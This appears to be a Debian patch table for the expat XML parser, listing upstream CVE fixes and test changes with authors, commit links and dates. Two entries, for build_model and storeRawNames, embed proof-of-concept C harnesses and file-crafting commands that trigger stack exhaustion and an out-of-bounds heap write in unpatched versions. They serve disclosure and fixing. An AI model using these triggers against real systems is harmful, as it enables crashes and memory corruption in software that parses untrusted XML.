Patch | Description | Author | Forwarded | Bugs | Origin | Last update |
---|---|---|---|---|---|---|
lib-Detect-and-prevent-troublesome-left-shifts-in-fu.patch | lib: Detect and prevent troublesome left shifts in function storeAtts (CVE-2021-45960) | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/0adcb34c49bee5b19bd29b16a578c510c23597ea | 2021-12-27 |
lib-Prevent-integer-overflow-on-m_groupSize-in-funct.patch | lib: Prevent integer overflow on m_groupSize in function doProlog (CVE-2021-46143) | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/85ae9a2d7d0e9358f356b33977b842df8ebaec2b | 2021-12-25 |
lib-Prevent-integer-overflow-at-multiple-places-CVE-.patch | lib: Prevent integer overflow at multiple places (CVE-2022-22822 to CVE-2022-22827) The involved functions are: - addBinding (CVE-2022-22822) - build_model (CVE-2022-22823) - defineAttribute (CVE-2022-22824) - lookup (CVE-2022-22825) - nextScaffoldPart (CVE-2022-22826) - storeAtts (CVE-2022-22827) |
Sebastian Pipping <sebastian@pipping.org> | no | debian | https://github.com/libexpat/libexpat/commit/9f93e8036e842329863bf20395b8fb8f73834d9e | 2021-12-30 |
lib-Detect-and-prevent-integer-overflow-in-XML_GetBu.patch | lib: Detect and prevent integer overflow in XML_GetBuffer (CVE-2022-23852) | Samanta Navarro <ferivoz@riseup.net> | no | https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40 | 2022-01-22 | |
tests-Cover-integer-overflow-in-XML_GetBuffer-CVE-20.patch | tests: Cover integer overflow in XML_GetBuffer (CVE-2022-23852) | Sebastian Pipping <sebastian@pipping.org> | no | https://github.com/libexpat/libexpat/commit/acf956f14bf79a5e6383a969aaffec98bfbc2e44 | 2022-01-23 | |
lib-Prevent-integer-overflow-in-doProlog-CVE-2022-23.patch | lib: Prevent integer overflow in doProlog (CVE-2022-23990) The change from "int nameLen" to "size_t nameLen" addresses the overflow on "nameLen++" in code "for (; name[nameLen++];)" right above the second change in the patch. |
Sebastian Pipping <sebastian@pipping.org> | no | https://github.com/libexpat/libexpat/commit/ede41d1e186ed2aba88a06e84cac839b770af3a1 | 2022-01-26 | |
Prevent-stack-exhaustion-in-build_model.patch | Prevent stack exhaustion in build_model It is possible to trigger stack exhaustion in build_model function if depth of nested children in DTD element is large enough. This happens because build_node is a recursively called function within build_model. The code has been adjusted to run iteratively. It uses the already allocated heap space as temporary stack (growing from top to bottom). Output is identical to recursive version. No new fields in data structures were added, i.e. it keeps full API and ABI compatibility. Instead the numchildren variable is used to temporarily keep the index of items (uint vs int). Documentation and readability improvements kindly added by Sebastian. Proof of Concept: 1. Compile poc binary which parses XML file line by line ``` cat > poc.c << EOF #include <err.h> #include <expat.h> #include <stdio.h> XML_Parser parser; static void XMLCALL dummy_element_decl_handler(void *userData, const XML_Char *name, XML_Content *model) { XML_FreeContentModel(parser, model); } int main(int argc, char *argv[]) { FILE *fp; char *p = NULL; size_t s = 0; ssize_t l; if (argc != 2) errx(1, "usage: poc poc.xml"); if ((parser = XML_ParserCreate(NULL)) == NULL) errx(1, "XML_ParserCreate"); XML_SetElementDeclHandler(parser, dummy_element_decl_handler); if ((fp = fopen(argv[1], "r")) == NULL) err(1, "fopen"); while ((l = getline(&p, &s, fp)) > 0) if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK) errx(1, "XML_Parse"); XML_ParserFree(parser); free(p); fclose(fp); return 0; } EOF cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c ``` 2. Create XML file with a lot of nested groups in DTD element ``` cat > poc.xml.zst.b64 << EOF KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ== EOF base64 -d poc.xml.zst.b64 | zstd -d > poc.xml ``` 3. Run Proof of Concept ``` ./poc poc.xml ``` |
Samanta Navarro <ferivoz@riseup.net> | yes | upstream | https://github.com/libexpat/libexpat/commit/9b4ce651b26557f16103c3a366c91934ecd439ab | 2022-02-15 |
Prevent-integer-overflow-in-storeRawNames.patch | Prevent integer overflow in storeRawNames It is possible to use an integer overflow in storeRawNames for out of boundary heap writes. Default configuration is affected. If compiled with XML_UNICODE then the attack does not work. Compiling with -fsanitize=address confirms the following proof of concept. The problem can be exploited by abusing the m_buffer expansion logic. Even though the initial size of m_buffer is a power of two, eventually it can end up a little bit lower, thus allowing allocations very close to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag names can be parsed which are almost INT_MAX in size. Unfortunately (from an attacker point of view) INT_MAX/2 is also a limitation in string pools. Having a tag name of INT_MAX/2 characters or more is not possible. Expat can convert between different encodings. UTF-16 documents which contain only ASCII representable characters are twice as large as their ASCII encoded counter-parts. The proof of concept works by taking these three considerations into account: 1. Move the m_buffer size slightly below a power of two by having a short root node <a>. This allows the m_buffer to grow very close to INT_MAX. 2. The string pooling forbids tag names longer than or equal to INT_MAX/2, so keep the attack tag name smaller than that. 3. To be able to still overflow INT_MAX even though the name is limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag which only contains ASCII characters. UTF-16 always stores two bytes per character while the tag name is converted to using only one. Our attack node byte count must be a bit higher than 2/3 INT_MAX so the converted tag name is around INT_MAX/3 which in sum can overflow INT_MAX. Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes without running into INT_MAX boundary check. The string pooling is able to store INT_MAX/3 as tag name because the amount is below INT_MAX/2 limitation. And creating the sum of both eventually overflows in storeRawNames. Proof of Concept: 1. Compile expat with -fsanitize=address. 2. Create Proof of Concept binary which iterates through input file 16 MB at once for better performance and easier integer calculations: ``` cat > poc.c << EOF #include <err.h> #include <expat.h> #include <stdlib.h> #include <stdio.h> #define CHUNK (16 * 1024 * 1024) int main(int argc, char *argv[]) { XML_Parser parser; FILE *fp; char *buf; int i; if (argc != 2) errx(1, "usage: poc file.xml"); if ((parser = XML_ParserCreate(NULL)) == NULL) errx(1, "failed to create expat parser"); if ((fp = fopen(argv[1], "r")) == NULL) { XML_ParserFree(parser); err(1, "failed to open file"); } if ((buf = malloc(CHUNK)) == NULL) { fclose(fp); XML_ParserFree(parser); err(1, "failed to allocate buffer"); } i = 0; while (fread(buf, CHUNK, 1, fp) == 1) { printf("iteration %d: XML_Parse returns %d\n", ++i, XML_Parse(parser, buf, CHUNK, XML_FALSE)); } free(buf); fclose(fp); XML_ParserFree(parser); return 0; } EOF gcc -fsanitize=address -lexpat -o poc poc.c ``` 3. Construct specially prepared UTF-16 XML file: ``` dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368 iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml ``` 4. Run proof of concept: ``` ./poc poc-utf16.xml ``` |
Samanta Navarro <ferivoz@riseup.net> | yes | upstream | https://github.com/libexpat/libexpat/commit/eb0362808b4f9f1e2345a0cf203b8cc196d776d9 | 2022-02-15 |
Prevent-integer-overflow-in-copyString.patch | Prevent integer overflow in copyString The copyString function is only used for encoding string supplied by the library user. |
Samanta Navarro <ferivoz@riseup.net> | yes | upstream | https://github.com/libexpat/libexpat/commit/efcb347440ade24b9f1054671e6bd05e60b4cafd | 2022-02-15 |
lib-Fix-harmless-use-of-uninitialized-memory.patch | lib: Fix (harmless) use of uninitialized memory | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/6881a4fc8596307ab9ff2e85e605afa2e413ab71 | 2022-02-12 |
lib-Protect-against-malicious-namespace-declarations.patch | lib: Protect against malicious namespace declarations (CVE-2022-25236) | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 | 2022-02-12 |
tests-Cover-CVE-2022-25236.patch | tests: Cover CVE-2022-25236 | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/2de077423fb22750ebea599677d523b53cb93b1d | 2022-02-12 |
lib-Drop-unused-macro-UTF8_GET_NAMING.patch | lib: Drop unused macro UTF8_GET_NAMING | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/ee2a5b50e7d1940ba8745715b62ceb9efd3a96da | 2022-02-08 |
lib-Add-missing-validation-of-encoding-CVE-2022-2523.patch | lib: Add missing validation of encoding (CVE-2022-25235) | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 | 2022-02-08 |
lib-Add-comments-to-BT_LEAD-cases-where-encoding-has.patch | lib: Add comments to BT_LEAD* cases where encoding has already been validated | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/c85a3025e7a1be086dc34e7559fbc543914d047f | 2022-02-09 |
tests-Cover-missing-validation-of-encoding-CVE-2022-.patch | tests: Cover missing validation of encoding (CVE-2022-25235) | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/6a5510bc6b7efe743356296724e0b38300f05379 | 2022-02-08 |
Fix-build_model-regression.patch | Fix build_model regression. The iterative approach in build_model failed to fill children arrays correctly. A preorder traversal is not required and turned out to be the culprit. Use an easier algorithm: Add nodes from scaffold tree starting at index 0 (root) to the target array whenever children are encountered. This ensures that children are adjacent to each other. This complies with the recursive version. Store only the scaffold index in numchildren field to prevent a direct processing of these children, which would require a recursive solution. This allows the algorithm to iterate through the target array from start to end without jumping back and forth, converting on the fly. |
Samanta Navarro <ferivoz@riseup.net> | yes | upstream | https://github.com/libexpat/libexpat/commit/b12f34fe32821a69dc12ff9a021daca0856de238 | 2022-02-19 |
tests-Protect-against-nested-element-declaration-mod.patch | tests: Protect against nested element declaration model regressions | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/154e565f6ef329c9ec97e6534c411ddde0b320c8 | 2022-02-20 |
lib-Relax-fix-to-CVE-2022-25236-with-regard-to-RFC-3.patch | lib: Relax fix to CVE-2022-25236 with regard to RFC 3986 URI characters | Sebastian Pipping <sebastian@pipping.org> | no | https://github.com/libexpat/libexpat/commit/2ba6c76fca21397959145e18c5ef376201209020 | 2022-02-27 | |
tests-Cover-relaxed-fix-to-CVE-2022-25236.patch | tests: Cover relaxed fix to CVE-2022-25236 | Sebastian Pipping <sebastian@pipping.org> | no | https://github.com/libexpat/libexpat/commit/e0f852db1e3b1e6d34922c68a653c3cc4b85361c | 2022-03-03 | |
lib-Document-namespace-separator-effect-right-in-hea.patch | lib: Document namespace separator effect right in header <expat.h> | Sebastian Pipping <sebastian@pipping.org> | no | https://github.com/libexpat/libexpat/commit/5dd52182972a35f2251a07784eda35d3d52d3e07 | 2022-03-01 | |
lib-doc-Add-a-note-on-namespace-URI-validation.patch | lib|doc: Add a note on namespace URI validation [Salvatore Bonaccorso: Backport to 2.2.10 for context changes] |
Sebastian Pipping <sebastian@pipping.org> | no | https://github.com/libexpat/libexpat/commit/c57bea96b73eee1c6d5e288f0f57efbf5238e49a | 2022-03-01 | |
CVE-2022-40674.patch | [PATCH] Ensure raw tagnames are safe exiting internalEntityParser It is possible to concoct a situation in which parsing is suspended while substituting in an internal entity, so that XML_ResumeParser directly uses internalEntityProcessor as its processor. If the subsequent parse includes some unclosed tags, this will return without calling storeRawNames to ensure that the raw versions of the tag names are stored in memory other than the parse buffer itself. If the parse buffer is then changed or reallocated (for example if processing a file line by line), badness will ensue. This patch ensures storeRawNames is always called when needed after calling doContent. The earlier call do doContent does not need the same protection; it only deals with entity substitution, which cannot leave unbalanced tags, and in any case the raw names will be pointing into the stored entity value not the parse buffer. |
Rhodri James <rhodri@wildebeest.org.uk> | no | 2022-08-17 | ||
CVE-2022-40674_addon.patch | [PATCH 1/2] tests: Cover heap use-after-free issue in doContent | Sebastian Pipping <sebastian@pipping.org> | no | 2022-09-11 | ||
lib-Fix-overeager-DTD-destruction-in-XML_ExternalEnt.patch | lib: Fix overeager DTD destruction in XML_ExternalEntityParserCreate | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/5290462a7ea1278a8d5c0d5b2860d4e244f997e4 | 2022-09-20 |
tests-Cover-overeager-DTD-destruction-in-XML_Externa.patch | tests: Cover overeager DTD destruction in XML_ExternalEntityParserCreate | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/43992e4ae25fc3dc0eec0cd3a29313555d56aee2 | 2022-09-19 |
tests-Move-triplet_start_checker-flag-check-after-isFinal.patch | tests: Move triplet_start_checker flag check after isFinal=1 call There is no guarantee that the callback will happen before the parse call with isFinal=XML_TRUE. Let's move the assertion to a location where we know it must have happened. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/d52b4141496bd26bd716d88c67af8f2250bd0da6 | 2023-08-24 | |
tests-Set-isFinal-in-test_column_number_after_parse.patch | tests: Set isFinal in test_column_number_after_parse Without this, parsing of the end tag may be deferred, yielding an unexpected column number. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/2cee1061e2fec10633c3f02a961dabf95e85910a | 2023-08-24 | |
tests-Set-isFinal-1-in-line-column-number-after-error-tes.patch | tests: Set isFinal=1 in line/column-number-after-error tests | Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/d4105a9080271a8d4996d2454f89be9992cb268a | 2023-08-31 | |
Always-consume-BOM-bytes-when-found-in-prolog.patch | Always consume BOM bytes when found in prolog The byte order mark is not correctly consumed when followed by an incomplete token in a non-final parse. This results in the BOM staying in the buffer, causing an invalid token error later. This was not detected by existing tests because they either parse everything in one call, or add a single byte at a time. By moving `s` forward when we find a BOM, we make sure that the BOM bytes are properly consumed in all cases. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/182bbc350ed8b3c547133a9a44a4f30a0ba3b77e | 2023-08-31 | |
tests-Add-_fail-function-and-assert_true-macro.patch | tests: Add _fail() function and assert_true() macro. | Guilhem Moulin <guilhem@debian.org> | no | https://github.com/libexpat/libexpat/commit/cce19de59f849cbee55c8c62e77481593fac1468 | 2024-09-11 | |
tests-Make-test_default_current-insensitive-to-callback-c.patch | tests: Make test_default_current insensitive to callback chunking Instead of testing the exact number and sequence of callbacks, we now test that we get the exact data lengths and sequence of callbacks. The checks become much more verbose, but will now accept any buffer fill strategy -- single bytes, multiple bytes, or any combination thereof. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/182bbc350ed8b3c547133a9a44a4f30a0ba3b77e | 2023-08-31 | |
tests-Look-for-single-char-match-in-test_abort_epilog.patch | tests: Look for single-char match in test_abort_epilog ...instead of a full-string match. These tests were depending on getting handler callbacks with exactly one character of data at a time. For example, if test_abort_epilog got "\n\r\n" in one callback, it would fail to match on the '\r', and would not abort parsing as expected. By searching the callback arg for the magic character rather than expecting a full match, the test no longer depends on exact callback timing. `userData` is never NULL in these tests, so that check was left out of the new version. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/4978d285d205d1238c823876134c3e486a3c2fe5 | 2023-08-31 | |
tests-Run-SINGLE_BYTES-with-variously-sized-chunks.patch | tests: Run SINGLE_BYTES with variously-sized chunks The _XML_Parse_SINGLE_BYTES function currently calls XML_Parse() one byte at a time. This is useful to detect possible parsing bugs related to having to exit parsing, wait for more data, and resume. This commit makes SINGLE_BYTES even more useful by repeating all tests, changing the chunk size every time. So instead of just one byte at a time, we now also test two bytes at a time, and so on. Tests that don't use the SINGLE_BYTES also run multiple times, but are otherwise not affected. This uncovered some issues, which have been fixed in preceding commits. On failure, the chunk size is included in the "FAIL" log prints. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/d2b31760cd5d22b26316d407789caded826857e3 | 2023-08-25 | |
tests-set-isFinal-in-test_line_number_after_parse.patch | tests: set isFinal in test_line_number_after_parse Without this, parsing of the start or end tag may be deferred, yielding an unexpected line number. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/2e1253414559d2649cbf5662496800061034eb49 | 2023-09-26 | |
tests-set-isFinal-in-test_reset_in_entity.patch | tests: set isFinal in test_reset_in_entity Without this, parsing may be deferred so that the suspending callback hasn't been called when the test checks for it. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/bb3c17198072abe89885949b85f8a0f353ac41c9 | 2023-09-26 | |
tests-Remove-early-comment-count-check-in-test_user_param.patch | tests: Remove early comment count check in test_user_parameters Before a parse call with isFinal=XML_TRUE, there is no guarantee that all supplied data has been parsed. Removing the first comment count check removes the test's assumption of such a guarantee. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/a5993b2d42d88e1a39124117a781a055dbb0598b | 2023-09-26 | |
tests-Exit-parser_stop_character_handler-if-parser-is-fin.patch | tests: Exit parser_stop_character_handler if parser is finished When test_repeated_stop_parser_between_char_data_calls runs without chunking the input -- which I am about to do in my next commit -- the parser_stop_character_handler callback happens multiple times. This is because stopping the parser doesn't stop all callbacks immediately, which is valid (documented) behavior. The second callback tried to stop the parser again, getting unexpected errors. Let's check the parser status on entry and return early if it's already finished. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/b4d2b76a97ab88854a26f4166cb294a0622144cd | 2023-09-26 | |
tests-Replace-invalid-entity-expansion-in-test_alloc_nest.patch | tests: Replace invalid entity expansion in test_alloc_nested_entities %pe2; would ultimately expand to a plain "ABCDEF...", which is not valid in this context. This was not normally hit, since the test would get its expected XML_ERROR_NO_MEMORY before expanding this far. With g_chunkSize=0 and EXPAT_CONTEXT_BYTES=OFF, the number of allocs required to reach that point becomes *just* low enough to reach the final expansion, making the test fail with a very unexpected syntax error. Nesting %pe2; in another entity declaration avoids the problem. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/7b0e27a6981014313a9f30486a0b4d2e0a3ebde3 | 2023-09-28 | |
tests-Run-SINGLE_BYTES-with-no-chunking.patch | tests: Run SINGLE_BYTES with no chunking ...in addition to 1-to-5-byte chunks as we've done so far. By starting g_chunkSize at 0, we get to run all the tests that call _XML_Parse_SINGLE_BYTES() as if they just called XML_Parse(). This gives us extra test coverage. |
Snild Dolkow <snild@sony.com> | no | https://github.com/libexpat/libexpat/commit/091ba48d7a5a8fcb65ba383d81d062c6e9046a88 | 2023-09-26 | |
CVE-2023-52425/01-119ae27.patch | Grow buffer based on current size Until now, the buffer size to grow to has been calculated based on the distance from the current parse position to the end of the buffer. This means that the size of any already-parsed data was not considered, leading to inconsistent buffer growth. There was also a special case in XML_Parse() when XML_CONTEXT_BYTES was zero, where the buffer size would be set to twice the incoming string length. This patch replaces this with an XML_GetBuffer() call. Growing the buffer based on its total size makes its growth consistent. The commit includes a test that checks that we can reach the max buffer size (usually INT_MAX/2 + 1) regardless of previously parsed content. GitHub CI couldn't allocate the full 1GiB with MinGW/wine32, though it works locally with the same compiler and wine version. As a workaround, the test tries to malloc 1GiB, and reduces `maxbuf` to 512MiB in case of failure. |
Snild Dolkow <snild@sony.com> | yes | upstream | https://github.com/libexpat/libexpat/commit/dcbc1436809b7cd4552ed4e929790739d08d0dca | 2023-09-28 |
CVE-2023-52425/02-3484383.patch | Add aaaaaa_*.xml with unreasonably large tokens Some of these currently take a very long time to parse. I set those to only run one loop in the run-benchmark make target. 4096 may be a fairly small buffer, and definitely make the problem worse than it otherwise would've been, but similar sizes exist in real code: * 2048 bytes in cpython Modules/pyexpat.c * 4096 bytes in skia SkXMLParser.cpp * BUFSIZ bytes (8192 on my machine) in expat/examples The files, too, are inspired by real-life examples: Android stores depth and gain maps as base64-encoded JPEGs inside the XMP data of other JPEGs. Sometimes as a text element, sometimes as an attribute value. I've seen attribute values slightly over 5 MiB in size. |
Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/3484383fa75e0ea2aa716360088813c3b205b261 | 2023-08-17 |
CVE-2023-52425/03-9cdf9b8.patch | Skip parsing after repeated partials on the same token When the parse buffer contains the starting bytes of a token but not all of them, we cannot parse the token to completion. We call this a partial token. When this happens, the parse position is reset to the start of the token, and the parse() call returns. The client is then expected to provide more data and call parse() again. In extreme cases, this means that the bytes of a token may be parsed many times: once for every buffer refill required before the full token is present in the buffer. Math: Assume there's a token of T bytes Assume the client fills the buffer in chunks of X bytes We'll try to parse X, 2X, 3X, 4X ... until mX == T (technically >=) That's (m²+m)X/2 = (T²/X+T)/2 bytes parsed (arithmetic progression) While it is alleviated by larger refills, this amounts to O(T²) Expat grows its internal buffer by doubling it when necessary, but has no way to inform the client about how much space is available. Instead, we add a heuristic that skips parsing when we've repeatedly stopped on an incomplete token. Specifically: * Only try to parse if we have a certain amount of data buffered * Every time we stop on an incomplete token, double the threshold * As soon as any token completes, the threshold is reset This means that when we get stuck on an incomplete token, the threshold grows exponentially, effectively making the client perform larger buffer fills, limiting how many times we can end up re-parsing the same bytes. Math: Assume there's a token of T bytes Assume the client fills the buffer in chunks of X bytes We'll try to parse X, 2X, 4X, 8X ... until (2^k)X == T (or larger) That's (2^(k+1)-1)X bytes parsed -- e.g. 15X if T = 8X This is equal to 2T-X, which amounts to O(T) We could've chosen a faster growth rate, e.g. 4 or 8. Those seem to increase performance further, at the cost of further increasing the risk of growing the buffer more than necessary. This can easily be adjusted in the future, if desired. This is all completely transparent to the client, except for: 1. possible delay of some callbacks (when our heuristic overshoots) 2. apps that never do isFinal=XML_TRUE could miss data at the end For the affected testdata, this change shows a 100-400x speedup. The recset.xml benchmark shows no clear change either way. Before: benchmark -n ../testdata/largefiles/recset.xml 65535 3 3 loops, with buffer size 65535. Average time per loop: 0.270223 benchmark -n ../testdata/largefiles/aaaaaa_attr.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 15.033048 benchmark -n ../testdata/largefiles/aaaaaa_cdata.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.018027 benchmark -n ../testdata/largefiles/aaaaaa_comment.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 11.775362 benchmark -n ../testdata/largefiles/aaaaaa_tag.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 11.711414 benchmark -n ../testdata/largefiles/aaaaaa_text.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.019362 After: ./run.sh benchmark -n ../testdata/largefiles/recset.xml 65535 3 3 loops, with buffer size 65535. Average time per loop: 0.269030 ./run.sh benchmark -n ../testdata/largefiles/aaaaaa_attr.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.044794 ./run.sh benchmark -n ../testdata/largefiles/aaaaaa_cdata.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.016377 ./run.sh benchmark -n ../testdata/largefiles/aaaaaa_comment.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.027022 ./run.sh benchmark -n ../testdata/largefiles/aaaaaa_tag.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.099360 ./run.sh benchmark -n ../testdata/largefiles/aaaaaa_text.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.017956 |
Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/9cdf9b8d77d5c2c2a27d15fb68dd3f83cafb45a1 | 2023-08-17 |
CVE-2023-52425/04-1b9d398.patch | Don't update partial token heuristic on error | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/1b9d398517befeb944cbbadadf10992b07e96fa2 | 2023-09-04 |
Autotools-Give-test-suite-access-to-internal-symbols.patch | Autotools: Give test suite access to internal symbols | Sebastian Pipping <sebastian@pipping.org> | no | https://github.com/libexpat/libexpat/commit/f01a61402cd44bb0cb59db43e70309c01acc50d1 | 2021-04-05 | |
CVE-2023-52425/05-9fe3672.patch | tests: Run both with and without partial token heuristic If we always run with the heuristic enabled, it may hide some bugs by grouping up input into bigger parse attempts. |
Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/9fe3672459c1bf10926b85f013aa1b623d855545 | 2023-09-18 |
CVE-2023-52425/06-f1eea78.patch | tests: Add max_slowdown info in test_big_tokens_take_linear_time | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/f1eea784d0429bc4813a3d66a8e24e6c9df56be7 | 2023-11-06 |
CVE-2023-52425/07-09957b8.patch | Allow XML_GetBuffer() with len=0 on a fresh parser len=0 was previously OK if there had previously been a non-zero call. It makes sense to allow an application to work the same way on a newly-created parser, and not have to care if its incoming buffer happens to be 0. |
Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/09957b8ced725b96a95acff150facda93f03afe1 | 2023-10-26 |
CVE-2023-52425/08-1d3162d.patch | Add app setting for enabling/disabling reparse heuristic | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/1d3162da8a85a398ab451aadd6c2ad19587e5a68 | 2023-09-11 |
CVE-2023-52425/09-8ddd8e8.patch | Try to parse even when incoming len is zero If the reparse deferral setting has changed, it may be possible to finish a token. |
Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/8ddd8e86aa446d02eb8d398972d3b10d4cad908a | 2023-09-29 |
CVE-2023-52425/10-ad9c01b.patch | Make external entity parser inherit partial token heuristic setting The test is essentially a copy of the existing test for the setter, adapted to run on the external parser instead of the original one. |
Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/ad9c01be8ee5d3d5cac2bfd3949ad764541d35e7 | 2023-10-26 |
CVE-2023-52425/11-60b7420.patch | Bypass partial token heuristic when close to maximum buffer size For huge tokens, we may end up in a situation where the partial token parse deferral heuristic demands more bytes than Expat's maximum buffer size (currently ~half of INT_MAX) could fit. INT_MAX/2 is 1024 MiB on most systems. Clearly, a token of 950 MiB could fit in that buffer, but the reparse threshold might be such that callProcessor() will defer it, allowing the app to keep filling the buffer until XML_GetBuffer() eventually returns a memory error. By bypassing the heuristic when we're getting close to the maximum buffer size, it will once again be possible to parse tokens in the size range INT_MAX/2/ratio < size < INT_MAX/2 reliably. We subtract the last buffer fill size as a way to detect that the next XML_GetBuffer() call has a risk of returning a memory error -- assuming that the application is likely to keep using the same (or smaller) fill. We subtract XML_CONTEXT_BYTES because that's the maximum amount of bytes that could remain at the start of the buffer, preceding the partial token. Technically, it could be fewer bytes, but XML_CONTEXT_BYTES is normally small relative to INT_MAX, and is much simpler to use. |
Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/60b74209899a67d426d208662674b55a5eed918c | 2023-10-04 |
CVE-2023-52425/12-3d8141d.patch | Bypass partial token heuristic when nearing full buffer ...instead of only when approaching the maximum buffer size INT/2+1. We'd like to give applications a chance to finish parsing a large token before buffer reallocation, in case the reallocation fails. By bypassing the reparse deferral heuristic when getting close to the filling the buffer, we give them this chance -- if the whole token is present in the buffer, it will be parsed at that time. This may come at the cost of some extra reparse attempts. For a token of n bytes, these extra parses cause us to scan over a maximum of 2n bytes (... + n/8 + n/4 + n/2 + n). Therefore, parsing of big tokens remains O(n) in regard how many bytes we scan in attempts to parse. The cost in reality is lower than that, since the reparses that happen due to the bypass will affect m_partialTokenBytesBefore, delaying the next ratio-based reparse. Furthermore, only the first token that "breaks through" a buffer ceiling takes that extra reparse attempt; subsequent large tokens will only bypass the heuristic if they manage to hit the new buffer ceiling. Note that this cost analysis depends on the assumption that Expat grows its buffer by doubling it (or, more generally, grows it exponentially). If this changes, the cost of this bypass may increase. Hopefully, this would be caught by test_big_tokens_take_linear_time or the new test. The bypass logic assumes that the application uses a consistent fill. If the app increases its fill size, it may miss the bypass (and the normal heuristic will apply). If the app decreases its fill size, the bypass may be hit multiple times for the same buffer size. The very worst case would be to always fill half of the remaining buffer space, in which case parsing of a large n-byte token becomes O(n log n). As an added bonus, the new test case should be faster than the old one, since it doesn't have to go all the way to 1GiB to check the behavior. Finally, this change necessitated a small modification to two existing tests related to reparse deferral. These tests are testing the deferral enabled setting, and assume that reparsing will not happen for any other reason. By pre-growing the buffer, we make sure that this new deferral does not affect those test cases. |
Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/3d8141d26a3b01ff948e00956cb0723a89dadf7f | 2023-11-20 |
CVE-2023-52425/13-8f8aaf5.patch | tests: Check heuristic bypass with varying buffer fill sizes The bypass works on the assumption that the application uses a consistent fill size. Let's make some assertions about what should happen when the application doesn't do that -- most importantly, that parsing does happen eventually, and that the number of scanned bytes doesn't explode. |
Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/8f8aaf5c8e8a6e812dd8dadd96cf9bd044bc085a | 2023-11-24 |
CVE-2023-52425/14-09fdf99.patch | xmlwf: Support disabling reparse deferral | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/09fdf998e7cf3f8f9327e6602077791095aedd4d | 2023-11-09 |
